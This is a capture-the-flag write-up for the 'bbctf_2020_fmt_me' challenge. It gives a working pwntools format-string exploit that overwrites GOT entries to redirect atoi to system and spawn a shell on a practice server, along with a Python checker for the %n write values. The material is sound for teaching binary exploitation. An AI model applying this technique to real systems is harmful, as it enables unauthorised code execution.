bbctf_2020_fmt_me

# Analysis

![](https://pic.imgdb.cn/item/63ad8b6c08b6830163dd4df3.png)

There is only one format string vulnerability and it is triggered only once, but the binary imports `system`. The plan is therefore to overwrite `system@got` with the address of `main`, and then overwrite the GOT entry of the `atoi` call inside `get_init()` with `system@plt[1]`, the second instruction of the PLT stub (`system@plt + 6`). That skips the `jmp *system@got` and enters the lazy-binding path directly, so the dynamic linker resolves the real address of `system` and calls it in place of `atoi`.

![](https://pic.imgdb.cn/item/63ad8c3908b6830163de9abc.png)

Then, when `fgets` reads the next input, send `/bin/sh` to get a shell.

# Exploit

```python
from pwn import *

# o = process('./pwn')
o = remote('node4.buuoj.cn', 25732)

system_got = 0x404028
system_plt = 0x401056   # system@plt + 6: the instruction right after jmp *system@got
atoi_got   = 0x404058
main       = 0x4011F7

o.sendline(b'2')

# The three pointers appended below land in stack slots 16, 17 and 18.
# printf's output counter starts at 0, so the directives write, in order:
#   %16$n     -> 0 into atoi_got+4 (clears the upper 32 bits)
#   %4198486p -> counter = 4198486 = 0x401056
#   %17$n     -> 0x401056 (system@plt + 6) into atoi_got
#   %417p     -> counter = 0x401056 + 417 = 0x4011F7
#   %18$n     -> 0x4011F7 (main) into system_got
payload = b"%16$n"
payload += b"%4198486p" + b"%17$n" + b"%417p" + b"%18$n"
payload = payload.ljust(0x50, b'a')
payload += p64(atoi_got + 4) + p64(atoi_got) + p64(system_got)

# pause()
o.sendline(payload)
o.interactive()
```
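As an added check that is not part of the original writeup, the following Python walks the payload above the way printf's character counter would and reports what each positional `%n` writes, which confirms the 0x401056 and 0x4011F7 values. It assumes only `%<width>p` and `%<pos>$n` directives appear, and a 14-character rendering of a 64-bit `%p` (that assumption only matters when a field width is smaller than the pointer text, which never happens here).

```python
import re

# Directives used by the writeup's payload: "%<pos>$n" (write the running count
# into the pointer found in stack slot <pos>) and "%<width>p" (print a pointer,
# padded to <width>). Other conversions are not needed for this payload.
DIRECTIVE = re.compile(r"%(?:(\d+)\$n|(\d+)?p)")

def simulate_n_writes(fmt, pointer_width=14):
    """Return {stack_slot: value} for every %<slot>$n in fmt, by tracking how
    many characters printf has emitted when each %n is reached.

    pointer_width is an assumed rendering length of a 64-bit '%p'
    (e.g. 0x00007ffc12345678 is 14 characters).
    """
    count = 0
    writes = {}
    pos = 0
    for m in DIRECTIVE.finditer(fmt):
        count += m.start() - pos          # literal bytes before the directive
        pos = m.end()
        if m.group(1) is not None:        # %<slot>$n: snapshot of the counter
            writes[int(m.group(1))] = count
        else:                             # %<width>p: pads up to the width
            width = int(m.group(2) or 0)
            count += max(width, pointer_width)
    return writes

def check_plan(fmt, plan):
    """plan maps a stack slot to (label, expected value); returns the slots
    whose simulated %n value differs from the plan (empty list means the
    payload arithmetic is consistent)."""
    got = simulate_n_writes(fmt)
    return [slot for slot, (_label, want) in plan.items() if got.get(slot) != want]

# The writeup's payload and its intended writes (addresses from the writeup).
PAYLOAD = "%16$n%4198486p%17$n%417p%18$n"
PLAN = {
    16: ("atoi@got + 4 (upper half, cleared to 0)", 0),
    17: ("atoi@got (system@plt + 6)", 0x401056),
    18: ("system@got (main)", 0x4011F7),
}

if __name__ == "__main__":
    for slot, value in sorted(simulate_n_writes(PAYLOAD).items()):
        print(f"%{slot}$n writes {value:#x} -> {PLAN[slot][0]}")
    print("mismatches:", check_plan(PAYLOAD, PLAN))
```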
